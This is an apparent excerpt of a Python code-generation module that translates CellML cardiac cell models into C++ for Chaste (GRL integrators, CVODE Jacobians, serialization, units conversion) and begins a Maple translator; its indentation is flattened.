self.output_derivative_calculations_grl(self.v_variable)
self.writeln()
self.writeln('double evalF = ', self.code_name(self.v_variable, ode=True), self.STMT_END)
self.writeln('mEvalF[', self.v_index, '] = ', self.code_name(self.v_variable, ode=True), self.STMT_END)
self.writeln('double partialF = EvaluatePartialDerivative', self.v_index, '(', self.code_name(self.free_vars[0]), ', rY, delta, true);')
self.writeln('if (fabs(partialF) < delta)')
self.open_block()
self.writeln('rY[v_index] += evalF*mDt;')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[v_index] += (evalF/partialF)*(exp(partialF*mDt)-1.0);')
self.close_block()
self.close_block()
        # ComputeOneStepExceptVoltage
        #############################
self.output_method_start('ComputeOneStepExceptVoltage',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
# Set up variables
self.writeln('std::vector<double>& rY = rGetStateVariables();')
self.writeln('const double delta = 1e-8;')
self.writeln()
# Evaluate RHS of equations (except dV/dt)
non_v_vars = self.state_vars[:]
if self.v_variable in non_v_vars:
non_v_vars.remove(self.v_variable)
self.output_derivative_calculations(non_v_vars)
# Compute partial derivatives (for non-V)
for i, var in enumerate(self.state_vars):
if var is not self.v_variable:
self.writeln('mEvalF[', i, '] = ', self.code_name(var, ode=True), self.STMT_END)
self.writeln('mPartialF[', i, '] = EvaluatePartialDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY, delta);')
# Do the GRL updates
for i, var in enumerate(self.state_vars):
if var is not self.v_variable:
self.open_block()
self.writeln('if (fabs(mPartialF[', i, ']) < delta)')
self.open_block()
self.writeln('rY[', i, '] += mDt*', self.code_name(var, True), ';')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[', i, '] += (', self.code_name(var, True), '/mPartialF[', i, '])*(exp(mPartialF[', i, ']*mDt)-1.0);')
self.close_block()
self.close_block()
self.close_block()
        # Evaluate each equation
        ########################
for i, var in enumerate(self.state_vars):
self.output_method_start('EvaluateYDerivative'+str(i),
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'std::vector<double>& rY'],
'double', access='public')
self.open_block()
if var is self.v_variable:
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
self.output_derivative_calculations_grl(var)
self.writeln()
self.writeln('return ', self.code_name(var, True), ';')
self.close_block()
self.output_grl_compute_partial(i, var)
#Megan E. Marsh, Raymond J. Spiteri
#Numerical Simulation Laboratory
#University of Saskatchewan
#December 2011
#Partial support provided by research grants from
#the National Science and Engineering Research
#Council (NSERC) of Canada and the MITACS/Mprime
#Canadian Network of Centres of Excellence.
def output_grl2_mathematics(self):
"""Output the special methods needed for GRL2 style cell models.
We generate:
        * UpdateTransmembranePotential updates V_m
* ComputeOneStepExceptVoltage does a GRL2 update for variables except voltage
* EvaluateYDerivativeI for each variable I
"""
self.find_grl_partial_derivatives()
        # UpdateTransmembranePotential
        ##############################
self.output_method_start('UpdateTransmembranePotential',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
self.writeln('std::vector<double>& rY = rGetStateVariables();')
self.writeln('const unsigned v_index = GetVoltageIndex();')
self.writeln('const double delta = 1e-8;')
self.writeln('const double yinit = rY[v_index];')
self.writeln()
# Do the first half step
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
self.output_derivative_calculations_grl(self.v_variable)
self.writeln()
self.writeln('double evalF = ', self.code_name(self.v_variable, ode=True), self.STMT_END)
self.writeln('mEvalF[', self.v_index, '] = ', self.code_name(self.v_variable, ode=True), self.STMT_END)
self.writeln('double partialF = EvaluatePartialDerivative', self.v_index, '(', self.code_name(self.free_vars[0]), ', rY, delta, true);')
self.writeln('if (fabs(partialF) < delta)')
self.open_block()
self.writeln('rY[v_index] += 0.5*evalF*mDt;')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[v_index] += (evalF/partialF)*(exp(partialF*0.5*mDt)-1.0);')
self.close_block()
# Do the second half step
self.writeln('rY[v_index] = yinit;')
self.writeln('evalF = EvaluateYDerivative', self.v_index, '(', self.code_name(self.free_vars[0]), ', rY);')
self.writeln('mEvalF[', self.v_index, '] = evalF;')
self.writeln('partialF = EvaluatePartialDerivative', self.v_index, '(', self.code_name(self.free_vars[0]), ', rY, delta, true);')
self.writeln('if (fabs(partialF) < delta)')
self.open_block()
self.writeln('rY[v_index] = yinit + evalF*mDt;')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[v_index] = yinit + (evalF/partialF)*(exp(partialF*mDt)-1.0);')
self.close_block()
self.close_block() # End method
        # ComputeOneStepExceptVoltage
        #############################
self.output_method_start('ComputeOneStepExceptVoltage',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
# Set up variables
self.writeln('std::vector<double>& rY = rGetStateVariables();')
self.writeln('const double delta=1e-8;')
self.writeln('const unsigned size = GetNumberOfStateVariables();')
self.writeln('mYInit = rY;')
self.writeln('double y_save;')
self.writeln()
# Calculate partial derivatives
self.output_derivative_calculations(self.state_vars)
for i, var in enumerate(self.state_vars):
self.writeln(self.vector_index('mEvalF', i), self.EQ_ASSIGN, self.code_name(var, True), self.STMT_END)
self.writeln()
for i, var in enumerate(self.state_vars):
if var is not self.v_variable:
self.writeln('mPartialF[', i, '] = EvaluatePartialDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY, delta);')
# Update all variables
self.writeln('for (unsigned var=0; var<size; var++)')
self.open_block()
self.writeln('if (var == ', self.v_index, ') continue;')
self.writeln('if (fabs(mPartialF[var]) < delta)')
self.open_block()
self.writeln('rY[var] = mYInit[var] + 0.5*mDt*mEvalF[var];')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[var] = mYInit[var] + (mEvalF[var]/mPartialF[var])*(exp(mPartialF[var]*0.5*mDt)-1.0);')
self.close_block()
self.close_block()
self.writeln()
# Determine new partial derivatives
for i, var in enumerate(self.state_vars):
if var is not self.v_variable:
self.writeln()
self.writeln('y_save = rY[', i, '];')
self.writeln('rY[', i, '] = mYInit[', i, '];')
self.writeln('mEvalF[', i, '] = EvaluateYDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY);')
self.writeln('mPartialF[', i, '] = EvaluatePartialDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY, delta);')
self.writeln('rY[', i, '] = y_save;')
# Update all variables
self.writeln('for (unsigned var=0; var<size; var++)')
self.open_block()
self.writeln('if (var == ', self.v_index, ') continue;')
self.writeln('if (fabs(mPartialF[var]) < delta)')
self.open_block()
self.writeln('rY[var] = mYInit[var] + mDt*mEvalF[var];')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[var] = mYInit[var] + (mEvalF[var]/mPartialF[var])*(exp(mPartialF[var]*mDt)-1.0);')
self.close_block()
self.close_block()
self.writeln()
self.close_block() # End method
        # Evaluate each equation
        ########################
for i, var in enumerate(self.state_vars):
self.output_method_start('EvaluateYDerivative'+str(i),
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'std::vector<double>& rY'],
'double', access='public')
self.open_block()
if var is self.v_variable:
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
self.output_derivative_calculations_grl(var)
self.writeln()
self.writeln('return '+self.code_name(var, True)+';')
self.close_block()
self.output_grl_compute_partial(i, var)
def output_model_attributes(self):
"""Output any named model attributes defined in metadata.
Such attributes are given by compound RDF annotations:
model --pycml:named-attribute--> bnode
bnode --pycml:name--> Literal(Attribute name, string)
bnode --pycml:value--> Literal(Attribute value, double)
"""
model = self.model
meta_id = model.cmeta_id
attrs = []
if meta_id:
property = cellml_metadata.create_rdf_node(('pycml:named-attribute', NSS['pycml']))
name_prop = cellml_metadata.create_rdf_node(('pycml:name', NSS['pycml']))
value_prop = cellml_metadata.create_rdf_node(('pycml:value', NSS['pycml']))
source = cellml_metadata.create_rdf_node(fragment_id=meta_id)
attr_nodes = cellml_metadata.get_targets(model, source, property)
for node in attr_nodes:
name = cellml_metadata.get_target(model, node, name_prop)
value = cellml_metadata.get_target(model, node, value_prop)
attrs.append((name, value))
for name, value in attrs:
self.writeln('this->mAttributes["', name, '"] = ', value, ';')
if attrs:
self.writeln()
def output_bottom_boilerplate(self):
"""Output bottom boilerplate.
End class definition, output ODE system information (to .cpp) and
serialization code (to .hpp), and end the file.
"""
# End main class
self.set_indent(offset=-1)
self.writeln_hpp('};\n\n')
# ODE system information
self.writeln('template<>')
self.writeln('void OdeSystemInformation<', self.class_name,
'>::Initialise(void)')
self.open_block()
self.writeln('this->mSystemName', self.EQ_ASSIGN, '"', self.model.name, '"', self.STMT_END)
self.writeln('this->mFreeVariableName', self.EQ_ASSIGN,
'"', self.var_display_name(self.free_vars[0]), '"', self.STMT_END)
self.writeln('this->mFreeVariableUnits', self.EQ_ASSIGN,
'"', self.free_vars[0].units, '"', self.STMT_END)
self.writeln()
def output_var(vector, var):
self.writeln('this->m', vector, 'Names.push_back("', self.var_display_name(var), '");')
self.writeln('this->m', vector, 'Units.push_back("', var.units, '");')
for var in self.state_vars:
output_var('Variable', var)
init_val = getattr(var, u'initial_value', None)
if init_val is None:
init_comm = ' // Value not given in model'
# Don't want compiler error, but shouldn't be a real number
init_val = self.NOT_A_NUMBER
else:
init_comm = ''
self.writeln('this->mInitialConditions.push_back(', init_val, ');',
init_comm, '\n')
# Model parameters
for var in self.cell_parameters:
if var.get_type() == VarTypes.Constant:
output_var('Parameter', var)
self.writeln()
# Derived quantities
for var in self.derived_quantities:
output_var('DerivedQuantity', var)
self.writeln()
self.output_model_attributes()
self.writeln('this->mInitialised = true;')
self.close_block()
self.writeln()
# Serialization
if self.include_serialization:
self.output_comment('Needs to be included last', subsidiary=True)
self.writeln_hpp('#include "SerializationExportWrapper.hpp"')
self.writeln_hpp('CHASTE_CLASS_EXPORT(', self.class_name, ')')
self.output_comment('Serialization for Boost >= 1.36')
self.writeln('#include "SerializationExportWrapperForCpp.hpp"')
self.writeln('CHASTE_CLASS_EXPORT(', self.class_name, ')')
self.writeln_hpp()
self.writeln_hpp('namespace boost')
self.open_block(subsidiary=True)
self.writeln_hpp('namespace serialization')
self.open_block(subsidiary=True)
# Save
self.writeln_hpp('template<class Archive>')
self.writeln_hpp('inline void save_construct_data(')
self.writeln_hpp('Archive & ar, const ', self.class_name,
' * t, const unsigned int fileVersion)',
indent_offset=1)
self.open_block(subsidiary=True)
self.writeln_hpp('const boost::shared_ptr<AbstractIvpOdeSolver> p_solver = t->GetSolver();')
self.writeln_hpp('const boost::shared_ptr<AbstractStimulusFunction> p_stimulus = t->GetStimulusFunction();')
self.writeln_hpp('ar << p_solver;')
self.writeln_hpp('ar << p_stimulus;')
self.close_block(subsidiary=True)
# Load
self.writeln_hpp('template<class Archive>')
self.writeln_hpp('inline void load_construct_data(')
self.writeln_hpp('Archive & ar, ', self.class_name,
' * t, const unsigned int fileVersion)',
indent_offset=1)
self.open_block(subsidiary=True)
self.writeln_hpp('boost::shared_ptr<AbstractIvpOdeSolver> p_solver;')
self.writeln_hpp('boost::shared_ptr<AbstractStimulusFunction> p_stimulus;')
self.writeln_hpp('ar >> p_solver;')
self.writeln_hpp('ar >> p_stimulus;')
self.writeln_hpp('::new(t)', self.class_name, '(p_solver, p_stimulus);')
self.close_block(subsidiary=True)
self.close_block(subsidiary=True)
self.close_block(subsidiary=True)
if self.dynamically_loadable:
# Write the C function to create instances of this cell model
self.writeln('extern "C"')
self.open_block()
self.writeln('AbstractCardiacCellInterface* MakeCardiacCell(')
self.writeln('boost::shared_ptr<AbstractIvpOdeSolver> pSolver,', indent_offset=2)
self.writeln('boost::shared_ptr<AbstractStimulusFunction> pStimulus)', indent_offset=2)
self.open_block()
self.writeln('return new ', self.class_name, '(pSolver, pStimulus);')
self.close_block()
self.close_block()
# End file
self.writeln_hpp('#endif // ', self.include_guard)
return
def output_lhs(self, expr):
"""Output the left hand side of an assignment expression."""
if expr.localName == 'ci':
self.output_variable(expr)
elif expr.operator().localName == 'diff':
ci_elt = expr.operands().next()
self.output_variable(ci_elt, ode=True)
return
def output_variable(self, ci_elt, ode=False):
"""Output a ci element, i.e. a variable lookup."""
if hasattr(ci_elt, '_cml_variable') and ci_elt._cml_variable:
self.write(self.code_name(ci_elt.variable, ode=ode))
else:
# This ci element doesn't have all the extra annotations. It is a fully
# qualified name though. This is typically because PE has been done.
prefix = ['var_', 'd_dt_'][ode]
varname = unicode(ci_elt)
try:
var = self.varobj(varname)
except KeyError:
var = None
if var:
self.write(self.code_name(var, ode=ode))
else:
# Assume it's a suitable name
self.write(prefix + varname)
return
def output_function(self, func_name, args, *posargs, **kwargs):
"""Override base class method for special case of abs with 2 arguments.
This comes from Maple's Jacobians, and should generate signum of the second argument.
"""
args = list(args)
if func_name == 'fabs' and len(args) == 2:
super(CellMLToChasteTranslator, self).output_function('Signum', [args[1]], *posargs, **kwargs)
else:
super(CellMLToChasteTranslator, self).output_function(func_name, args, *posargs, **kwargs)
@staticmethod
def get_current_units_options(model):
"""
Return a list of units objects that give the possibilities for the dimensions
of transmembrane ionic currents.
"""
chaste_units = cellml_units.create_new(
model, 'uA_per_cm2',
[{'units': 'ampere', 'prefix': 'micro'},
{'units': 'metre', 'prefix': 'centi', 'exponent': '-2'}])
microamps = cellml_units.create_new(model, u'microamps',
[{'units':'ampere', 'prefix':'micro'}])
A_per_F = cellml_units.create_new(model, 'A_per_F',
[{'units': 'ampere'},
{'units': 'farad', 'exponent': '-1'}])
return [chaste_units, microamps, A_per_F]
# Name in CellML for the variable representing Chaste's membrane capacitance
MEMBRANE_CAPACITANCE_NAME = u'chaste_membrane_capacitance'
# Name of the component added to interface the model to Chaste
INTERFACE_COMPONENT_NAME = u'chaste_interface'
@staticmethod
def add_special_conversions(converter, comp):
"""Add special units conversions for ionic currents.
Adds conversions for the two other common conventions to/from the units expected by Chaste,
uA/cm^2. The cases are:
1. Current in amps/farads.
In this case we convert to uA/uF then multiply by Chaste's value
for the membrane capacitance (in uF/cm^2).
2. Current in amps, capacitance in farads.
We assume the cell model conceptually represents a cell, and hence
that its membrane capacitance is supposed to represent the same
thing as Chaste's. Thus convert current to uA, capacitance to uF,
and return current/capacitance * Chaste's capacitance.
comp is a component to which we should add any necessary variables, i.e. Chaste's capacitance.
"""
klass = CellMLToChasteTranslator
model = converter.model
# Variables needed by some conversions
model_Cm = model.get_config('Cm_variable')
uF_per_cm2 = cellml_units.create_new(model, 'uF_per_cm2',
[{'units': 'farad', 'prefix': 'micro'},
{'units': 'metre', 'prefix': 'centi', 'exponent': '-2'}])
Chaste_Cm = converter.add_variable(comp, klass.MEMBRANE_CAPACITANCE_NAME, uF_per_cm2)
model._cml_Chaste_Cm = Chaste_Cm # Record for use in code_name
# Add the conversions
chaste_units, microamps, A_per_F = klass.get_current_units_options(model)
converter.add_special_conversion(A_per_F, chaste_units,
lambda expr: converter.times_rhs_by(expr, Chaste_Cm))
converter.add_special_conversion(chaste_units, A_per_F,
lambda expr: converter.divide_rhs_by(expr, Chaste_Cm))
if model_Cm:
converter.add_special_conversion(microamps, chaste_units,
lambda expr: converter.times_rhs_by(converter.divide_rhs_by(expr, model_Cm),
Chaste_Cm))
converter.add_special_conversion(chaste_units, microamps,
lambda expr: converter.divide_rhs_by(converter.times_rhs_by(expr, model_Cm),
Chaste_Cm))
@staticmethod
def generate_interface(doc, solver_info):
"""Generate an interface component connecting the model to Chaste.
On return from this method, Chaste code will only need to interact with variables in
the new interface component. It will contain the transmembrane potential, the ionic
and stimulus currents, the simulation time, and the derivatives.
It may also contain other variables depending on the model, for example the intracellular
calcium concentration (if annotated), modifiable parameters, and derived quantities.
If the --convert-interfaces option has been supplied, units conversion will then be
performed on this component, ensuring that all these variables are in the units expected
by Chaste and linked by suitable conversions to the rest of the model.
Note that if partial evaluation is then performed, the model will be collapsed into a
single component. However, the interface will still be preserved in the correct units.
"""
model = doc.model
config = doc._cml_config
klass = CellMLToChasteTranslator
# Create Chaste units definitions
ms = cellml_units.create_new(model, 'millisecond',
[{'units': 'second', 'prefix': 'milli'}])
mV = cellml_units.create_new(model, 'millivolt',
[{'units': 'volt', 'prefix': 'milli'}])
current_units, microamps = klass.get_current_units_options(model)[0:2]
# The interface generator
generator = processors.InterfaceGenerator(model, name=klass.INTERFACE_COMPONENT_NAME)
iface_comp = generator.get_interface_component()
# In case we need to convert initial values, we create the units converter here
if config.options.convert_interfaces:
warn_only = not config.options.fully_automatic and config.options.warn_on_units_errors
notifier = NotifyHandler(level=logging.WARNING)
logging.getLogger('units-converter').addHandler(notifier)
converter = processors.UnitsConverter(model, warn_only, show_xml_context_only=True)
klass.add_special_conversions(converter, iface_comp)
generator.set_units_converter(converter)
# And now specify the interface
t = model.find_free_vars()[0]
if not ms.dimensionally_equivalent(t.get_units()):
# Oops!
raise TranslationError('Time does not have dimensions of time')
generator.add_input(t, ms)
if doc.model.get_option('backward_euler'):
# Backward Euler code generation requires access to the time step
model_dt = solver_info.create_dt(generator, t.component, t.get_units())
config.dt_variable = generator.add_input(model_dt, ms)
config.dt_variable.set_pe_keep(True)
elif doc.model.get_option('maple_output'):
# CVODE Jacobians need to be able to scale for time too
fake_dt = generator.add_variable(t.component, 'fake_dt', ms, initial_value='1.0')
fake_dt._set_type(VarTypes.Constant)
config.dt_variable = generator.add_input(fake_dt, t.get_units())
config.dt_variable.set_is_modifiable_parameter(False)
config.dt_variable.set_pe_keep(True)
if config.options.use_chaste_stimulus and config.i_stim_var:
# We need to make it a constant so add_input doesn't complain, then make it computed
# again so that exposing metadata-annotated variables doesn't make it a parameter!
generator.make_var_constant(config.i_stim_var, 0)
config.i_stim_var = generator.add_input(config.i_stim_var, current_units,
annotate=False, convert_initial_value=False)
generator.make_var_computed_constant(config.i_stim_var, 0)
# Also convert variables that make up the default stimulus
        # Note: we vary between input and output primarily to test units conversion of initial values
def add_oxmeta_ioput(oxmeta_name, units, inout):
var = doc.model.get_variable_by_oxmeta_name(oxmeta_name, throw=False)
if var:
meth = getattr(generator, 'add_%sput' % inout)
newvar = meth(var, units, annotate=False)
newvar.set_pe_keep(True)
for n in ['duration', 'period', 'offset', 'end']:
add_oxmeta_ioput('membrane_stimulus_current_'+n, ms, 'in')
add_oxmeta_ioput('membrane_stimulus_current_amplitude', current_units, 'out')
if config.V_variable:
config.V_variable = generator.add_input(config.V_variable, mV)
ionic_vars = config.i_ionic_vars
if ionic_vars:
i_ionic = generator.add_output_function('i_ionic', 'plus', ionic_vars, current_units)
config.i_ionic_vars = [i_ionic]
if doc.model.get_option('use_data_clamp'):
assert config.V_variable and ionic_vars
# Create g_clamp
conductance_units = current_units.quotient(mV).simplify()
i_data_clamp_conductance = generator.add_variable(iface_comp, 'membrane_data_clamp_current_conductance', conductance_units, initial_value='0.0')
i_data_clamp_conductance._set_type(VarTypes.Constant)
i_data_clamp_conductance.set_pe_keep(True) # This prevents it becoming 'chaste_interface__membrane_data_clamp_current_conductance'
config.i_data_clamp_conductance = generator.add_input(i_data_clamp_conductance, conductance_units)
# Create V_clamp
data_var = config.i_data_clamp_data = generator.add_variable(iface_comp, 'experimental_data_voltage', mV, initial_value='0.0')
data_var._set_type(VarTypes.Constant)
data_var.set_pe_keep(True)
data_var._cml_code_name = 'GetExperimentalVoltageAtTimeT(%(time)s)'
# Create the current: I = g_clamp * (V - V_clamp)
current_var = config.i_data_clamp_current = generator.add_variable(iface_comp, 'membrane_data_clamp_current', current_units)
current_var._set_type(VarTypes.Computed)
current_var.set_is_derived_quantity(True)
sub = mathml_apply.create_new(model, u'minus', [config.V_variable.name, data_var.name])
times = mathml_apply.create_new(model, u'times', [config.i_data_clamp_conductance.name, sub])
assign = mathml_apply.create_new(model, u'eq', [current_var.name, times])
generator.add_expr_to_comp(iface_comp, assign)
# Make dV/dt use the new current
def process_ci(elt):
# Add reference to new current after first existing ionic current
ref = mathml_ci.create_new(model, local_current_var.name)
elt.xml_parent.xml_insert_after(elt, ref)
if hasattr(ionic_vars[0], '_cml_ref_in_dvdt'):
local_current_var = generator.connect_variables(current_var, (ionic_vars[0]._cml_ref_in_dvdt.component.name, current_var.name))
process_ci(ionic_vars[0]._cml_ref_in_dvdt)
else:
dVdt = config.V_variable.get_all_expr_dependencies()[0]
local_current_var = generator.connect_variables(current_var, (config.V_variable.component.name, current_var.name))
def process_ci_elts(elt):
"""Recursively process any ci elements in the tree rooted at elt."""
if isinstance(elt, mathml_ci):
if elt.variable is ionic_vars[0]:
process_ci(elt)
else:
for child in getattr(elt, 'xml_children', []):
process_ci_elts(child)
process_ci_elts(dVdt)
# Finish up
def errh(errors):
raise TranslationError("Creation of Chaste interface component failed:\n " + str(errors))
generator.finalize(errh, check_units=False)
# Apply units conversions just to the interface, if desired
if config.options.convert_interfaces:
converter.add_conversions_for_component(iface_comp)
converter.finalize(errh, check_units=False)
notifier.flush()
logging.getLogger('units-converter').removeHandler(notifier)
if notifier.messages:
msg = 'Problems occurred converting model variables to Chaste units.\n'
if ionic_vars and ionic_vars[0].get_units().dimensionally_equivalent(microamps):
msg += 'To convert the ionic currents for this model, '\
'the model membrane capacitance needs to be identified.'
if config.options.fully_automatic:
raise TranslationError(msg)
else:
print >>sys.stderr, msg
class CellMLToCvodeTranslator(CellMLToChasteTranslator):
"""Translate a CellML model to C++ code for use with Chaste+CVODE."""
# Type of (a reference to) the state variable vector
TYPE_VECTOR = 'N_Vector '
TYPE_VECTOR_REF = 'N_Vector ' # CVODE's vector is actually a pointer type
def vector_index(self, vector, i):
"""Return code for accessing the i'th index of vector."""
return 'NV_Ith_S(' + vector + ', ' + str(i) + ')'
def vector_create(self, vector, size):
"""Return code for creating a new vector with the given size."""
return ''.join(map(str, [self.TYPE_VECTOR, vector, self.EQ_ASSIGN,
'N_VNew_Serial(', size, ')', self.STMT_END]))
def vector_initialise(self, vector, size):
"""Return code for creating an already-declared vector with the given size."""
return ''.join(map(str, [vector, self.EQ_ASSIGN, 'N_VNew_Serial(', size, ')', self.STMT_END]))
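    # For illustration, assuming the inherited ' = ' and ';' tokens:
    #     vector_index('rY', 0)  ->  "NV_Ith_S(rY, 0)"
    #     vector_create('rY', 3) ->  "N_Vector rY = N_VNew_Serial(3);"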
def output_top_boilerplate(self):
"""Output top boilerplate code.
This method outputs #includes, and the start of the cell class
with constructor, destructor, and LT methods.
"""
# CVODE is optional in Chaste
self.writeln("#ifdef CHASTE_CVODE")
self.writeln_hpp("#ifdef CHASTE_CVODE")
self.include_serialization = True
self.use_backward_euler = False
if self.use_data_clamp:
            self.use_analytic_jacobian = False # TODO: the data clamp current is not yet included in the analytic Jacobian.
self.output_includes(base_class='AbstractCvodeCellWithDataClamp')
else:
self.use_analytic_jacobian = (self.model.get_option('maple_output') and hasattr(self.model.solver_info, u'jacobian'))
self.output_includes(base_class='AbstractCvodeCell')
# Separate class for lookup tables?
if self.use_lookup_tables and self.separate_lut_class:
self.output_lut_class()
# Start cell model class
self.writeln_hpp('class ', self.class_name, self.class_inheritance)
self.open_block(subsidiary=True)
# Serialization
self.output_serialize_method()
# Parameter declarations, and set & get methods (#666)
self.output_cell_parameters()
# Constructor
self.output_constructor(['boost::shared_ptr<AbstractIvpOdeSolver> pOdeSolver /* unused; should be empty */',
'boost::shared_ptr<AbstractStimulusFunction> pIntracellularStimulus'],
['pOdeSolver', len(self.state_vars), self.unsigned_v_index, 'pIntracellularStimulus'])
# Destructor
self.output_method_start('~'+self.class_name, [], '', access='public')
self.open_block()
self.close_block()
# Other declarations & methods
self.output_chaste_lut_methods()
self.output_verify_state_variables()
def output_mathematics(self):
"""Output the mathematics in this model.
Two methods are needed:
* EvaluateYDerivatives computes the RHS of the ODE system
* GetIIonic returns the total ionic current
"""
self.output_get_i_ionic()
self.output_evaluate_y_derivatives(method_name='EvaluateYDerivatives')
if self.use_analytic_jacobian:
self.output_jacobian()
self.output_derived_quantities()
def output_bottom_boilerplate(self):
"""Call superclass method, then end the CHASTE_CVODE guard."""
super(CellMLToCvodeTranslator, self).output_bottom_boilerplate()
# CVODE is optional in Chaste
self.writeln("#endif // CHASTE_CVODE")
self.writeln_hpp("#endif // CHASTE_CVODE")
def output_extra_constructor_content(self):
"""Tell the base class if we have an analytic Jacobian."""
if self.use_analytic_jacobian:
self.writeln('mUseAnalyticJacobian = true;')
self.writeln('mHasAnalyticJacobian = true;')
def _count_operators(self, exprs, result=None):
if result is None: result = {}
for expr in exprs:
if isinstance(expr, mathml_apply):
op = expr.operator().localName
result[op] = 1 + result.get(op, 0)
children = expr.xml_element_children()
if children:
self._count_operators(children, result)
return result
def output_jacobian(self):
"""Output an analytic Jacobian for CVODE to use."""
self.output_method_start('EvaluateAnalyticJacobian',
['long int N', self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
self.TYPE_VECTOR + 'rY', self.TYPE_VECTOR + 'rDY',
'CHASTE_CVODE_DENSE_MATRIX rJacobian',
self.TYPE_VECTOR + 'rTmp1', self.TYPE_VECTOR + 'rTmp2', self.TYPE_VECTOR + 'rTmp3'],
'void', access='public')
self.open_block()
# Mathematics that the Jacobian depends on
used_vars = set([self.config.dt_variable])
for entry in self.model.solver_info.jacobian.entry:
used_vars.update(self._vars_in(entry.math))
nodeset = self.calculate_extended_dependencies(used_vars, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(nodeset=nodeset, assign_rY=False)
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset|set(map(lambda e: e.math, self.model.solver_info.jacobian.entry)), self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
self.writeln()
# Jacobian entries, sorted by index with rows varying fastest
self.output_comment('Matrix entries')
entries = []
def gv(vn):
return self.varobj(vn).get_source_variable(recurse=True)
for entry in self.model.solver_info.jacobian.entry:
var_i, var_j = gv(entry.var_i), gv(entry.var_j)
i = self.state_vars.index(var_i)
j = self.state_vars.index(var_j)
entry_content = list(entry.math.xml_element_children())
assert len(entry_content) == 1, "Malformed Jacobian entry: " + entry.xml()
entry = entry_content[0]
if not (isinstance(entry, mathml_cn) and entry.evaluate() == 0.0):
entries.append((j, i, var_i is self.v_variable, entry))
entries.sort()
for j, i, is_V, entry in entries:
self.writeln('DENSE_ELEM(rJacobian, ', i, ', ', j, ') = ', self.code_name(self.config.dt_variable), ' * (', nl=False)
paren = False
if is_V:
self.write('mSetVoltageDerivativeToZero ? 0.0 : ')
paren = True
self.output_expr(entry, paren)
self.writeln(')', self.STMT_END, indent=False)
# self.output_comment('Debugging!')
# self.writeln('#ifndef NDEBUG', indent=False)
# self.writeln('for (long int j=0; j<N; j++)')
# self.open_block()
# self.writeln('for (long int i=0; i<N; i++)')
# self.open_block()
# self.writeln('if (std::isnan(DENSE_ELEM(rJacobian, i, j)))')
# self.open_block()
# self.writeln('std::cerr << "NAN at J(" << i << "," << j << ")" << DumpState("", rY);')
# self.close_block(blank_line=False)
# self.writeln('EXCEPT_IF_NOT(!std::isnan(DENSE_ELEM(rJacobian, i, j)));')
# self.close_block(blank_line=False)
# self.close_block(blank_line=False)
# self.writeln('//CheckAnalyticJacobian(', self.code_name(self.free_vars[0]),
# ', rY, rDY, rJacobian, rTmp1, rTmp2, rTmp3);')
# self.writeln('#endif // NDEBUG', indent=False)
self.close_block()
class CellMLToMapleTranslator(CellMLTranslator):
"""Translate a CellML model to Maple code."""
# Language tokens that differ from the default
EQ_ASSIGN = ' := ' # Assignment operator
COMMENT_START = '# ' # Start of a 1 line comment
# Types are determined automatically by Maple
TYPE_DOUBLE = ''
TYPE_CONST_DOUBLE = ''
# Some constants are different
PI = 'Pi'
E = 'exp(1)'
def __init__(self, omit_constants=False, compute_full_jacobian=False,
**kwargs):
"""Create a Maple translator.
If omit_constants is set to true, assignments will not be
generated for constant variables. This should be used if
these values will be altered at runtime, in order to prevent
derivatives being calculated incorrectly.
Set compute_full_jacobian to True to make Maple compute the
Jacobian of the whole ODE system, rather than just the
nonlinear portion.
Other keyword arguments are all passed to the base class.
"""
super(CellMLToMapleTranslator, self).__init__(**kwargs)
# Maple translation doesn't support lookup tables
self.use_lookup_tables = False
# Translation parameters
self.omit_constants = omit_constants
self.compute_full_jacobian = compute_full_jacobian
# Update some function names
self.function_map = CellMLTranslator.function_map.copy()
del self.function_map['power']
self.function_map.update(
{'abs': 'abs', 'ln': 'ln', 'not': 'not',
'sec': 'sec', 'csc': 'csc', 'cot': 'cot',
'sech': 'sech', 'csch': 'csch', 'coth': 'coth',
'arcsin': 'arcsin', 'arccos': 'arccos', 'arctan': 'arctan',
'arcsec': 'arcsec', 'arccsc': 'arccsc', 'arccot': 'arccot',
'arcsinh': 'arcsinh', 'arccosh': 'arccosh', 'arctanh': 'arctanh',
'arcsech': 'arcsech', 'arccsch': 'arccsch', 'arccoth': 'arccoth'})
self.recip_trig = {}
self.nary_ops = CellMLTranslator.nary_ops.copy()
self.nary_ops.update({'and': 'and', 'or': 'or'})
self.binary_ops = CellMLTranslator.binary_ops.copy()
self.binary_ops.update({'xor': 'xor', 'eq': '=', 'neq': '<>',
'power': '^'})
self.special_roots = {}
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.mpl'
def output_top_boilerplate(self):
"""Output top boilerplate."""
self.writeln('# Model: ', self.model.name)
self.output_comment(version_comment(self.add_timestamp))
self.writeln()
self.writeln('interface(prettyprint=0);\n')
if self.compute_full_jacobian:
self.writeln('print("FULL JACOBIAN");')
return
#
# def output_mathematics(self):
# if self.compute_full_jacobian:
# pass
# else:
# super(CellMLToMapleTranslator, self).output_mathematics()
def output_bottom_boilerplate(self):
"""Output bottom boilerplate."""
